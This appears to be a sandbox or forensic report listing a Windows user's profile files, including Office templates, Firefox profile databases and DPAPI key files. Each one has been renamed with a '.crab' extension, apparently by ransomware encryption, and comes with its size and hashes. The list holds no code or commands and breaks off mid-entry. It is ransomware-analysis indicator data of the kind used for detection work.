c:\users\fd1hvy\appdata\roaming\cz7czoo.swf.crab 49.90 KB MD5: b0fd55020c84b2a9e803b8eda326420b
SHA1: a94c2207ee2b6d6c6ae697f8f3910f5995221b25
SHA256: ab9c48ede1fdebf1ed769473f36d7d15413a54d0a26f97ff61c4c45fb5eec859
False
c:\users\fd1hvy\appdata\roaming\dx12g0.flv.crab 94.38 KB MD5: e63d082f08dd866e7555b85c11ac020b
SHA1: c13e30fe6e89990c1f2669292c40335b22ddae5f
SHA256: a2b2ea3497a5658b82fe7baa80ce4e6391b9d1590229d7c85a705460d6dab31d
False
c:\users\fd1hvy\appdata\roaming\dxoeanru.m4a.crab 33.35 KB MD5: 260ea36517a3cbac047f5c84c457d891
SHA1: 8f2540c5db10f194f7773192eeef508944bb83e3
SHA256: 7dbd983af4b7367fd2ada0ed8895a8a7ecb66159ca4b3c17cbf1eb5c8b9ef3e4
False
c:\users\fd1hvy\appdata\roaming\e6n3l.bmp.crab 55.55 KB MD5: 03fe275bb26a3af0ec6f226c3c9415ae
SHA1: 7f71343b98ce82cca57538bf3ecd6176da886632
SHA256: 13f836ed8c366f0e7c23ca6445fc0e88324d24b8385d66ff4558ef408a9daa61
False
c:\users\fd1hvy\appdata\roaming\elvartyshnl.odp.crab 51.04 KB MD5: 0ed44fb94f70c0fe3f4bff89b18aea3d
SHA1: 7962c491b2c5359a9c747fa3ff506c2293bfbf9b
SHA256: c161c379a449fc221b122dd94bdf69f64687424c356dd2236e7957dc005c2f33
False
c:\users\fd1hvy\appdata\roaming\eo4d2ql.wav.crab 95.51 KB MD5: 2d194459d7fb83fce5ae6f0e75f9267f
SHA1: 6602931f366e7aad1abb5ef6a90ae805453ca861
SHA256: 194d59c1258e0722b12839db07255bc0566a5e970646cc513411ceb0c411a13e
False
c:\users\fd1hvy\appdata\roaming\fiix7k.bmp.crab 34.52 KB MD5: 55fd377d42a00adc2b9f5ad5ffbcdcaf
SHA1: fcda3c607eddb8b8a2dee377ef4de8867841adfc
SHA256: 401ec4fbe2455c1c71fc3ace792bfe2b7dd553d06e76b1f0315ef7f4f5d2f581
False
c:\users\fd1hvy\appdata\roaming\g6-jfvm7lu6u9x3fz.wav.crab 54.51 KB MD5: c5438fdd366774523f4910d70ce03234
SHA1: ed064811cc74c586c35b0c2386a458fa07df20ca
SHA256: 40d8a6774b7a2f62165467758af96132ae20cb85260259b5ef9da41d704246fa
False
c:\users\fd1hvy\appdata\roaming\hejjgihhexhzv.wav.crab 20.96 KB MD5: e894752b1db14adedd259fe2479af8ac
SHA1: 2fb55719f4a41b6c3b551338de5db906fa896162
SHA256: ca8298d530c4d59c3cc39ca7c4bec96deeedfcfda300827e3c92db26b26fee7d
False
c:\users\fd1hvy\appdata\roaming\ja sfgovzvysq.gif.crab 4.21 KB MD5: 281028c49da9a753f929b69546507a93
SHA1: 15da6531e30090b6e3091b2a8462f90028ecb79b
SHA256: 67c0110e19596242677563d5ca2a374e027d3b283754bcd59653e7ccb6dadfe9
False
c:\users\fd1hvy\appdata\roaming\jw08q7.flv.crab 7.79 KB MD5: 2f1fd74b4b4354835ab1db8b29758448
SHA1: 16436e508cf1cafdabc247f423973f393e34b278
SHA256: e43607bcaa3a691e823fb9974d6829abef703dc714db9a083a9da92b6c570757
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\#sharedobjects\xcvudunh\#appcontainer\aa.online-metrix.net\fpc.swf\session.sol.crab 0.59 KB MD5: 5773c4d8ea039e4259263835fb22f5e1
SHA1: abb07551dae9bddd14ec787044f986a24a962fd2
SHA256: ff32f70e010c0c1b286a641a789ea0e1d622243c38dd2baeec1218912909c778
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol.crab 0.71 KB MD5: a0837aef55ace29c29cdf2f0b6920b33
SHA1: a568a52a7d9e0948e05b7c772c603e7229c2c426
SHA256: 5bd90ccb53f5a6634a2dbfb2553907d4e9ddc8d5301eace561d1e00cec70a8ef
False
c:\users\fd1hvy\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 1.04 KB MD5: 99d99212c7ef0a0cd6a2ceddd6a5a7c9
SHA1: 720c499891a1b748cc4a5cd8cf37310356fd801a
SHA256: ba537cf9407f6911685d8139b8485f4c4b7f2ed466f8a2f286a2b062c0c005d3
False
c:\users\fd1hvy\appdata\roaming\mbkhyqxbm8.png.crab 59.88 KB MD5: 910c47f242251e3ff9fc2e5681783859
SHA1: e57028fb71324046101ea5f8c413cc640f993d4c
SHA256: 41229340f9d53e9f81153985c5715237ae248622f42b0e9e316b0271facd4725
False
c:\users\fd1hvy\appdata\roaming\microsoft\access\accesscache.accdb.crab 196.51 KB MD5: 54e3fe0c6f9702c4fe420aa4cea8366f
SHA1: b12e4914d87b67d0d2b5d425eb935eb5d40da39d
SHA256: ff700219aa01216a64eb419cd14e1fea541a3fc0c14bcccc169e66fe50b363b3
False
c:\users\fd1hvy\appdata\roaming\microsoft\access\system.mdw.crab 124.51 KB MD5: f92fa350379a1d800465bcd0cf28ff0c
SHA1: ec27bd704114d14944a369d89fbcc4e71eed0e84
SHA256: d29effe808b09c3971d2f7f84cbde5db62a117fb7f5e305a5dc33a09b1a4f384
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.30 KB MD5: 06cb1b1474739b4c0e4b2527773b1163
SHA1: 5d02d1e3cab83a1be04411390c630da04b494749
SHA256: b15f6e4cd9cf6ebba50202f08e759c0743a84c2e84bc0bf9dfeead44b29fd689
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.57 KB MD5: 4a55af7c6ca6bd175084d7e5ec1fc7ba
SHA1: 29a65e7b3c0daf568eca8b66377c2d2f3e9c7dfe
SHA256: 53e172b7ec93f571818e7e20dfd5d22c6c2a52c7fa435efbf5fc7990ac1b3ba7
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.88 KB MD5: 5f2498b344669888776a894cf475869e
SHA1: dda24a22608520bf62305ea6ac1c9aa62c96ee35
SHA256: f3167d22d4ad47ea1e3885e52b14fa4030326de0860e2369298d8ed4b91cf013
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.87 KB MD5: bd60b176cbf5bf98274788bac3ea318c
SHA1: a41769f7832aae3bc6151ce53c36e0aa027ed570
SHA256: 18767aceafc79f457a8ebb8cbe2ce1b4aa997f22799ba232612dca002aaa9454
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.07 KB MD5: 08eac3cd78f0fc1cfbf406a936a85da3
SHA1: 71df1dd9967ffd1de09b4e9114b8ae65d6ebfd82
SHA256: 8cb4640001e007cb54c25ee07feff9d425ef0984c1efacd1cd11de52f3bbe594
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.65 KB MD5: 89e875b3b166d1d74fd2733b3815a3a8
SHA1: 3a4214bdb2c78cd3050c17604727702e21218ad0
SHA256: 8ff73f52699a7d0148c3d8a53690f6f9f23c56045590ba23e032a7374b177893
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.13 KB MD5: 905c68e11e37fc4f518bb3f0e1e35c84
SHA1: 2a8c34133c0d9cc8d18c787e475ac8a73354eb7a
SHA256: f20c38f4a091451cc92d2ed985f12a493bb5e9a4f05eac9208ba2e7e2b4fbde8
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.82 KB MD5: fbc020b6ca4ba4c86424c69355e8eef6
SHA1: 3450688175250ebd63e6496c70a4bd7f26d931c8
SHA256: 61b58d0637b9fa26d040ce67382fb5a535789de9a49ad0ccaedefad17fe03a89
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 212.99 KB MD5: 38ae6a3cc5aa3b6ef88ca7a0fa8116e8
SHA1: d55d322702a8856da3658928e71e61f49c613c83
SHA256: 8cfcc93d9bb0c0b7d45e1bd3e8fc82a81b064d2eee3e129a7820110751baa3ef
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.76 KB MD5: b8b1dcfcdf4afb34f131a0ee5f8238ca
SHA1: 47465ecbb8ae840ce4f8e825b26ec967e57a1654
SHA256: 9e67ecb3b11fe05f10b6c98df3ba2ae13afed2ab5eed1fe879a0ca98f745111a
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.96 KB MD5: fe3be5f5b14b03e191f98940eb6977d6
SHA1: 7a004aeca9995debbe8f0b9ea2261946047b41b8
SHA256: 7c2bebdc9257dc40342f1bc66740faea63a998569de32dad717b565f3eab93e5
False
c:\users\fd1hvy\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.10 KB MD5: c859271b22b01b7217d6e25ac39ab0cb
SHA1: 3e8407d89c1cd51df79261aeb597a41586882c64
SHA256: 3680cef0fb31b53952164fde51f8f4adefeafd943b24d23dbea01a3e422463c6
False
c:\users\fd1hvy\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71.crab 0.55 KB MD5: 6bd9780b6b74e78a6559755633078e00
SHA1: 5b5258e0d9944398ffdbb312ea3c7fba09f1810d
SHA256: 79b2b3b4718a3fdc63664e8f681587a1f20c3485fc4ca0ff8946dac2f3c33137
False
c:\users\fd1hvy\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: 99a8ab0fe14da95676f363a969853a0e
SHA1: 6be92fcaca143a3870214df1d0723a3fc1c03654
SHA256: bff8bdb182d5ef27685bd4b29972984654a77c1185c2910df28ed151bf4d13c3
False
c:\users\fd1hvy\appdata\roaming\microsoft\ms project\16\en-us\global.mpt.crab 1.21 MB MD5: 4fe0c11ed3211cdb072a4364cf14b0d4
SHA1: c565544d7309623d985ae91237abd9978e02078a
SHA256: b82af1575ac2c673d7210a2ae0b89c468c0afe1ac7cd7ea7f7fdf5cadf9fad74
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\mso1033.acl.crab 37.37 KB MD5: bd10dbf3a848bb6f97a7f6747f6db024
SHA1: e6327f7216431219d5d12db0e4d31940d22a8d78
SHA256: 43fde4167cfe2a5c6f3ead88984661dff8448eb564f14afc4fb567058054b144
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\con2.lnk.crab 0.79 KB MD5: 3ec4cb5b3601dae19278112e2691a00b
SHA1: 53667cb724a7cb94776ffbec41d4efe5f2ed4839
SHA256: d82a3666175f6235661f470ec0884a34e38e667d396a7dd540f9ab6437bc8eaa
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\database1.lnk.crab 1.59 KB MD5: 689b6903d16555d13ea4d72885959f8d
SHA1: 313fa9878d4caa3af555e1bc0dcb0a39ff04c11a
SHA256: a15a9aac49d7eda73ce2e4d0348e48e6e22c2888ebf127fd3a4543d5a45dc3d6
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\database2.lnk.crab 1.59 KB MD5: 99752cf9378acbab1f56bd2314fd2506
SHA1: 55fe66d505760a0b1b1132a6393c65687f596a3e
SHA256: a125d78fc0fb84e85ca268d6b9ff1fe863392a14558733c4a44679d7a0053115
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\documents.lnk.crab 1.43 KB MD5: 54eee01d4cfc0ca08276e28e351f4094
SHA1: c890980bd4000fc83a11f2a4264d1dc003a57c30
SHA256: 2a74f51ea191925ee2330e4b4cda40ddaf69a5390c28c382b4e1483f584a3216
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.96 KB MD5: d9c7fef803a90a25467e99793c886e73
SHA1: ba22b24ce27c3cdcc4094a25faa53d9858cd4df3
SHA256: 822f0de81eb78fa7bbaf1d7b78a5d178cbbf6e66fa97a14f696283a01fb36035
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\index.dat.crab 0.71 KB MD5: 05ff64a2bd64f4a2d73d739dda08c432
SHA1: f20eaca064d5a9d1648650e19b55bf5b0b87bdf5
SHA256: 18605b2667d901b9e4c7f57451d1bd42c2827a317114eac22e135edb19dc95c6
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\sample_file.lnk.crab 1.55 KB MD5: 272b13403ea5a253b88108e376571e67
SHA1: e7eed02bb4705500f876a09af17856524f6d031a
SHA256: d20cfcaa992501a71cc7ef72d8a773f4fb3a59d3255c1ee057701b337ef7f2c2
False
c:\users\fd1hvy\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.66 KB MD5: 2ebd65eb057c371257c58c0adaa2aecd
SHA1: e5ca2e55bfc33897a5cbdb3a1ae5912775761c45
SHA256: ae53f507e7cf216133a3b8c43ddbb850738807378eba1e4db2cbfad292a82f0d
False
c:\users\fd1hvy\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: 376efe022e99e4575becd031cae83fee
SHA1: c6f76bd38e52647f6f07bb8ee3592009ceda123e
SHA256: eb4c0b53d144d019b3430b48705a2aa979a83f03b569185209fdd1ca925c5ea2
False
c:\users\fd1hvy\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.79 KB MD5: 400c4200cfe1f201d9c6796a07f155be
SHA1: ead8afbc6847e75a646c1a66c6a9d7ed870a16c9
SHA256: c2327b77763821026cad6e703496af5c6d37e7eaf659a66d81a66596e8f03900
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\credhist.crab 0.82 KB MD5: 30745a45cbdaa2e9229c0315825eedf7
SHA1: a1e31e5d3fdbb9ba54307ebffe349dd556de1b00
SHA256: 67472f05d19753d134259284a099458895dc1f585530435dbe81daca3c3989c9
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\s-1-5-21-1051304884-625712362-2192934891-1000\5c218343-f813-4ba1-8332-5b3fa0f5717a.crab 0.98 KB MD5: ae740ede26e98dce0b9df0374db6ee62
SHA1: 4af63ca0866ef9c33c0494eff4a6e577531a0abb
SHA256: c460cd5ec6419690559ad9e3814c764308842f10184305159a684efbc4bf3cab
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\s-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347.crab 0.98 KB MD5: 24e1cdf3f9c20c10808c34760a7509c6
SHA1: 6aa10ffa6ca410c4fe115df9c1e61c93bd7fbbce
SHA256: fcbd8596a42fb1184902363e353287c8486806880fcade6153d8ca2204ae6276
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\s-1-5-21-1051304884-625712362-2192934891-1000\e01a7a31-687e-4cfa-9cfe-700ac08104e6.crab 0.98 KB MD5: 44f8d3ead2e9721d4e82cc72fa58c59c
SHA1: 38d77729fcf993a54d74214f0447492b3e9ac95f
SHA256: 485005981d61293501a146023a5b9a51b2f6e1eeefece7d16359a795e947c8ac
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\s-1-5-21-1051304884-625712362-2192934891-1000\preferred.crab 0.54 KB MD5: 377799a1a97344bc72150bdc3bc3d4a2
SHA1: 63d17167bd77caecf5915dad9cf02c910256428a
SHA256: 6aac6a1dd276b48b60e387e3d042938cd6b47b14c396b2b58e9bf2745c749164
False
c:\users\fd1hvy\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 49787f54069a7acc8a49921c185351c9
SHA1: 02acbc1e162b85978827a5a92182aa71a09ab373
SHA256: 4ffd7720084698f859db138900ea438f8d0e3ded13541723e24dc9cddb374bd2
False
c:\users\fd1hvy\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: f27f4ee912cf89cf41a61c0cceac3d69
SHA1: cbb64ec5ec81f460a09848371b5933be6a3df2f9
SHA256: 4bcd0d14104927d152c3f3a2e0827117e9ca2465599e33e9440a07b490af02a1
False
c:\users\fd1hvy\appdata\roaming\microsoft\templates\cashflow analysis.xltm.crab 371.62 KB MD5: add5ee23dce180a3912ed0587f2f313b
SHA1: 18a47be487b279c4d8d51170a33e2b755ec5d287
SHA256: 00d5a06498200b47b42954d5f28916ac2ef7c20e1634422bc577b89dfc79fcb4
False
c:\users\fd1hvy\appdata\roaming\microsoft\templates\normal.dotm.crab 18.02 KB MD5: d4dc57e4f3186ceb75a0ee70c6e09262
SHA1: 91fce05de63c8a79d8b613145cd0e335fab84040
SHA256: 9f578548299d48c2865704c9260190ad738b983a9f49b217173c895e15dc98c7
False
c:\users\fd1hvy\appdata\roaming\microsoft\templates\welcome to excel.xltx.crab 483.98 KB MD5: 89c9ef561b5aa7b14592df253f769b32
SHA1: e0479292325aa155f4a5a403bb63a41f834aac1b
SHA256: 432706fb16e332ad285d61631f3500b56cf40a43882fd460abfae0f781380654
False
c:\users\fd1hvy\appdata\roaming\microsoft\templates\~$normal.dotm.crab 0.68 KB MD5: 69a88f7da770e42221789ef666c40e0d
SHA1: 034c1e037c52f05d0ccc56093435b021c8c37751
SHA256: 32b6e4f7e68ec760254b588ac16ab95162623a17e52020f1f49893f8f394b640
False
c:\users\fd1hvy\appdata\roaming\microsoft\uproof\custom.dic.crab 0.54 KB MD5: cb5cf207d8efd564577db560f23e5cdb
SHA1: 42b5f611e64e038cecc2c62aa5cf3ceb79640055
SHA256: ef979ea33a871a860b2d3905926381778a94171ff5efd8feecb3d66093c7f4b4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\crash reports\installtime20170824053622.crab 0.52 KB MD5: e8287ff38d361108ddfc60ff0cf19c55
SHA1: f308a1142041b783b3520346c7750456621a3dd3
SHA256: 8f9a73ad048f6e7b72dd650f670f1dacb53ffc13d27eaf332cb996c78abf7d2b
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\addons.json.crab 0.54 KB MD5: 2b0dcfcb95c21739521f19d8ee77bd55
SHA1: 38f024d535de7d5f2c7e8ef7d4136eb451ffad48
SHA256: 78cfaff41dd79ee086dd9e8cb034506f0ef80f85880fe9fdda17c2fec20a09d4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\addonstartup.json.lz4.crab 1.16 KB MD5: 997e0c5919a140b4f0eb5e508599982d
SHA1: cd335e8709fafce94d4ca0ea8c38f143e831216f
SHA256: a3b25303725a557776505bc7bdf4dac6648aaa2f5953b0408c0d863c90506730
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\blocklist.xml.crab 274.12 KB MD5: ba0e41da95329ff57aaefcc74a31f456
SHA1: e06ba0fed87766b6d852c7f7c5e07fb3487653aa
SHA256: 6eab62f4faa29a72ee825ff3a90abd01eb517cf5b8199b91b887950fb3641b88
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\cert8.db.crab 64.51 KB MD5: 5432bd6d70f14b348e12c2d033aedd82
SHA1: 9002dadc7a094f998502323988c4297dc5a6352a
SHA256: f608a8c5fe4696a06b0c686715335f635f638dcaf739e9c4b7a38d893fc3f9ff
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\compatibility.ini.crab 0.71 KB MD5: 3f5eeeadaa175edce8b4176a723f4c0f
SHA1: b51b0679e236deedf79e08fb96dce1d766015bb6
SHA256: 9f2c684f395521e0952c779a3998b318fe3b66f90f8d9f1cbf633e56f4fec5fb
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\containers.json.crab 1.30 KB MD5: 22853b51033aa1ec2dd0b837ccd27a60
SHA1: 5c18d83ce47f0c7a3842b01cf8666a57c3512227
SHA256: c4f08e72905538a76554247745606b4058306f8188f92e3c9b919dd11bd88bd3
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\content-prefs.sqlite.crab 224.51 KB MD5: ac806ad8fb43a1f10e2981bed435b975
SHA1: d5fe978b6fd408caa2375243065106218f2ebdba
SHA256: 415b664ede88fa87e46ec71bf838b64d0cfe4ef5514ca295e6e626263212ff8c
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\cookies.sqlite.crab 512.51 KB MD5: 281be5676557903e201c95c72cb10604
SHA1: 2c874d4f190d8056de3865af3de20988cf51510c
SHA256: 3f0a20332a453fe8bf6fad564f1c962b1ebc24dad036a458106d89835c54f6d3
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\crashes\store.json.mozlz4.crab 0.59 KB MD5: a979807d5f1964f8ab75a8652dc1d487
SHA1: 7874d497eb627262dcfe60397e923cee8f7711af
SHA256: a43db74c50101fe735fc17cb2fcc3ace860f65d7b86fc1b6a65a4cf253cb39db
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\datareporting\archived\2017-12\1513694905834.da7c9676-f8c5-46e7-a28d-350079b8e30e.main.jsonlz4.crab 6.46 KB MD5: 363a8d7c798c32c9ce05d8b7a336d052
SHA1: 1d16771d1f118211068eed75d911601fddd2cfe7
SHA256: 540e54cf52611062acf8331c4fdb273395952039865d9f2bb34e56da53e36d9c
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\datareporting\session-state.json.crab 0.68 KB MD5: 1f482847d5ed00ec31500ae507479ddd
SHA1: dc2d3e79e32e95c68353caaddd11a88e8d8ec0b9
SHA256: 8e654c6c4a75906222cc2da0f5e8c9309ecefcb21929b25ea7fcf25e634fe969
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\datareporting\state.json.crab 0.57 KB MD5: 647f46f052d2759349aa6012c4d3927c
SHA1: 52a726babbea764465d6e9e03bb4c8bda75dcaf1
SHA256: 7db0b72e8e79cc9f4327ee8b516c0a6ab7217c9e6245257601fcc8491f0d308c
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\extensions.json.crab 10.80 KB MD5: 3f6c034a731718be3f53f938e9ea8c5d
SHA1: 83179d2dd8879c1d9e2d9e3f7cd5cdb42d70f56a
SHA256: 5fa9d0440e2e28c531eed6b7fa39a0ab7043d12613a1dbdf1c483174c3ed3f30
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\favicons.sqlite.crab 5.00 MB MD5: 2e16bbae3a6acb36fcc192e179a8d98c
SHA1: a2418491edc6fd7629f231290336b9cc2b765aaf
SHA256: 6b83b09e567b681ac5d05e02d1bc7dfb5860041fd6da10c9d0a2633cccea42c7
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info.crab 0.63 KB MD5: da73002cd0ec6dd8c4ee9352ef310c70
SHA1: c76fabc43cde76a1622bddab8d2e9d10eca4ce89
SHA256: 58e81435cfe900bdaf3e0dc23bb5ab2649b6641512f67ff21a4466753ce72c30
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\license.txt.crab 0.98 KB MD5: eb26c99392f366a569dd3813669e778f
SHA1: e42b69471d7d6ec68048a9ad68295312c24a5d81
SHA256: 198b8e400351fb63af45af7b4945db793fe72357a5bfc7c3c70784370d5e417f
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json.crab 0.85 KB MD5: c77fb9656f0fc12c883599593633e734
SHA1: 1605724433d87dea43857847fc6a540651f24217
SHA256: 907e05fcdd282d9e9ab9e9232687458dfd12338e547aa8ae67011427f96f8884
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.crab 2.91 KB MD5: fb5f69dfcdea709774760adb3e9d11f8
SHA1: dc364fb2235feb4b70a2eeeaea4abe5dcdba07cb
SHA256: 2ef192ee5b03e346bed5f5dfbd416eac31387dec2315628af71fce8f7da7ecc4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\handlers.json.crab 1.18 KB MD5: 7810251ac4472d6b12e47c6c31202f94
SHA1: 93b5058003636e5b0c9540e90b4bc09b4ab9955b
SHA256: 78d9abd95f55b63784b6ceb1e1a58f85dfb6e7e296937de4dd932b031cbd7000
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\key3.db.crab 16.51 KB MD5: 98c6672181ba2e1d4f2b5c6057f98913
SHA1: 52f0fbc00c466dfd5d3b94d8d7e27436cd402e6d
SHA256: 792f8cc369528cea1f6b15510868d28dd484d4233107ade4462730eed191a5ef
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\permissions.sqlite.crab 96.51 KB MD5: 7bb3bc6d286134b212c2a91d18d2deb4
SHA1: 1f64c8a496cf9cd5825d6418f55c6b14f8445165
SHA256: 257cbdb94f7a12aedf7340d664dd1b0fd789b83a8b5e1db1497f4bed4e4c2c71
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\places.sqlite.crab 5.00 MB MD5: 227549b3cb1c261fcd824a4bbba3991d
SHA1: 38a944a9e50eaf42c85d06c45f45c8975beca7fe
SHA256: 43877fc51617912eb36e098e1733722f5643198c9864371ef0c4ffdd93099047
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\pluginreg.dat.crab 1.04 KB MD5: 020edd1b65ad62f17b15a6e423811099
SHA1: cc20b62c7a11270326eef90e5cb0e9179b9f5ea2
SHA256: 9a26cf7dcd8a97d56a6490984951d12c9f0c8dc3c04ac197d15bcec3828895cd
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\prefs.js.crab 8.41 KB MD5: b327c80c2a17fc05a6d6f2102eec1973
SHA1: 5ff1efe636c064cb8393f7552cd5f766a8b96095
SHA256: 5dc9488298a0db0482bb3bedb339cd7e1bebb00d6e4df355a267c331dfbc81b9
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\search.json.mozlz4.crab 14.24 KB MD5: e030a1aa65128ab80fff5dec1c89834a
SHA1: 4e24af5378b068033605e4818d4cf18e52de11e3
SHA256: 2a9010c440f01350f831b666a16faa529ffc639296cc6803647e86fb7c3ff9f3
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\secmod.db.crab 16.51 KB MD5: a8db3c29ffabbb18be7d72bb58c29036
SHA1: 8987d038b8751b1815601974dc1d25dc394bc45c
SHA256: 55036fc07bc541a505fc50d08af10b3da92ae3286e08bf650a6323099d4b4d8a
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\sessioncheckpoints.json.crab 0.79 KB MD5: c85fb821fc583934e0d09c973b410d86
SHA1: 1a083dcb5ff404ebde8552f034c498468ea25f9b
SHA256: 30f487f310afdae1fdbf5d609738f78a49a547d4b534604cc34e1d5e7985c74d
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\sessionstore-backups\previous.js.crab 5.57 KB MD5: 4c276335d8e318b552ff92ed8c49a2ab
SHA1: 9223be242c05297bf762dc694f9549a956a2fbd5
SHA256: 55725bb26863f593086e3a2bd694ea01ab9e5621dddfad36e4306bf03732e2c4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622.crab 14.23 KB MD5: 6461af11d76f5cd0d5b98eda7ba265f7
SHA1: 742d049c1b27f5322c8deddc81c445fe26c1b4ee
SHA256: 5acae0666be666ba2471d37c24dea6b74cf00ce12db28a3f078d844ac6196b66
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\sessionstore.js.crab 3.24 KB MD5: 86cf9b3c0b5ff3db5eb9e0db6197e387
SHA1: 7df1cd62e9c086c92c72d1f305e2873c42eaf471
SHA256: 05c20f2c66f43374ad84e077ac6b7536d3736f662e964b481dacb9af4e89ad09
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\sitesecurityservicestate.txt.crab 2.29 KB MD5: 015987fa1676c9d385cea6a8a4dad7e8
SHA1: b6aec28d0afd9395e721475f7317dba71bfacb4e
SHA256: 8045170f7096a46ea7f36388b8f73aef5d24450f2f18e3d3e01e8d1c6093b87e
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\chrome\.metadata.crab 0.54 KB MD5: 87c3d1ad0a33c48e35bb74341184d332
SHA1: 8e096ef5941cbe24f0bba437811a2f2684563076
SHA256: 5ac778418bc124be425f5146dea605eaafa19cf56d0ca131dd659d0544cb6bf4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2.crab 0.55 KB MD5: 17abd686cf500fd7d9fc7a976b3693d4
SHA1: 6ec29e473f69ae1f4131ed58bc5f9e1130d73713
SHA256: 428a78941ff694a5c8f8e07254cdd7aa5b371143d34a2c59342d9ec697ff41e4
False
c:\users\fd1hvy\appdata\roaming\mozilla\firefox\profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite.crab 48.51 KB MD5: 6740f3b1417132a1c9ef0caade81cba3
